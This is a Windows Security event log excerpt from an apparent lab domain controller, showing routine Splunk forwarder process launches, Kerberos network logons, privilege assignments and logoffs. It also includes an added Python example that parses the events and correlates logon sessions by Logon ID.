Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:18:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264526
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b04
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:18:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264525
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:18:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264527
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1138
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:18:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264529
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:18:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264528
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1160
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264532
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82867F
Logon Type: 3
04/19/2021 03:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264531
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x82867F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62742
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
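The 4634 and 4624 descriptions above say the two events correlate on Logon ID, and the 4672 events carry the same ID in their Subject. Below is an added example, not part of this dump or of any Splunk or Microsoft tooling, that parses this Splunk-rendered multi-line layout and joins 4624 (logon), 4672 (special privileges) and 4634 (logoff) on (ComputerName, Logon ID). The SAMPLE string is constructed from values on this page, trimmed to the fields the parser reads; the 4624 for 0x82C4D9 is deliberately left out so the unmatched logoff shows up, and the `loopback` field and the field names in the session dict are this example's own choices.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample (values from this page, trimmed); 0x82C4D9's 4624 is omitted on purpose.
SAMPLE = """\
04/19/2021 03:18:55 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x0
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x82867F
Network Information:
Source Network Address: ::1
04/19/2021 03:18:55 PM
EventCode=4672
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x82867F
Privileges: SeSecurityPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
04/19/2021 03:19:07 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x0
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x828CE5
Network Information:
Source Network Address: fe80::4c41:d752:3570:2ca6
04/19/2021 03:19:18 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x828CE5
04/19/2021 03:19:55 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x82C4D9
"""

TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")
KV_RE = re.compile(r"^([A-Za-z]+)=(.*)$")        # Splunk header fields, e.g. EventCode=4624
SECTION_RE = re.compile(r"^([A-Za-z ]+):$")       # "Subject:", "New Logon:", ...
FIELD_RE = re.compile(r"^([A-Za-z ()]+): (.*)$")  # "Logon ID: 0x82867F"

def parse_events(text):
    """One dict per event, fields keyed 'Section/Name' so the Subject's Logon ID (0x0 on a
    4624) is not confused with the New Logon's. Microsoft's explanatory lines are ignored."""
    events, ev, section = [], None, ""
    for line in (l.strip() for l in text.splitlines()):
        if TS_RE.match(line):
            ev = {"_time": datetime.strptime(line, "%m/%d/%Y %I:%M:%S %p"), "Privileges": []}
            events.append(ev)
            section = ""
        elif ev is None or not line:
            continue
        elif m := KV_RE.match(line):
            ev[m[1]] = m[2]
        elif m := SECTION_RE.match(line):
            section = m[1]
        elif m := FIELD_RE.match(line):
            if m[1] == "Privileges":
                ev["Privileges"].append(m[2])
            else:
                ev[f"{section}/{m[1]}" if section else m[1]] = m[2]
        elif line.startswith("Se") and line.endswith("Privilege"):
            ev["Privileges"].append(line)  # continuation lines of a 4672 privilege list
    return events

def correlate_sessions(events):
    """Join 4624, 4672 and 4634 on (host, Logon ID). Logon IDs are unique only between
    reboots of one host, so the host is part of the key, and a 4634 whose 4624 lies outside
    the window is kept and flagged as an orphan instead of being dropped."""
    sessions = defaultdict(lambda: {"privileges": []})
    for ev in events:
        host, code = ev.get("ComputerName", "?"), ev.get("EventCode")
        if code == "4624":
            s = sessions[(host, ev["New Logon/Logon ID"].lower())]
            s.update(account=ev.get("New Logon/Account Name"), start=ev["_time"],
                     source=ev.get("Network Information/Source Network Address"))
        elif code == "4672":
            sessions[(host, ev["Subject/Logon ID"].lower())]["privileges"] = ev["Privileges"]
        elif code == "4634":
            sessions[(host, ev["Subject/Logon ID"].lower())]["end"] = ev["_time"]
    for (host, lid), s in sessions.items():
        s.update(host=host, logon_id=lid, loopback=s.get("source") in ("::1", "127.0.0.1"),
                 orphan_logoff="end" in s and "start" not in s)
        if "start" in s and "end" in s:
            s["duration_s"] = (s["end"] - s["start"]).total_seconds()
    return dict(sessions)
```

Two things the join has to tolerate are visible in this dump: within one second the events are listed in descending RecordNumber, so a 4634 can precede the 4624 it closes and the join must key on the ID rather than on file order; and the Creator Logon ID 0x3E7 in every 4688 is the fixed SYSTEM session, which never produces a 4634 and so should not be counted as an open session.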
04/19/2021 03:18:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264530
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x82867F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264544
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1890
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264543
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828B3D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264542
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828C2B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264541
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828C73
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264540
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x828CE5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62747
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264539
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828CE5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264538
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x828C73
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62746
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264537
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828C73
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264536
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x828C2B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264535
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828C2B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264534
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x828B3D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62745
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:19:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264533
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x828B3D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:19:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264545
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264547
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264546
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1840
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:19:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264549
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bb4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
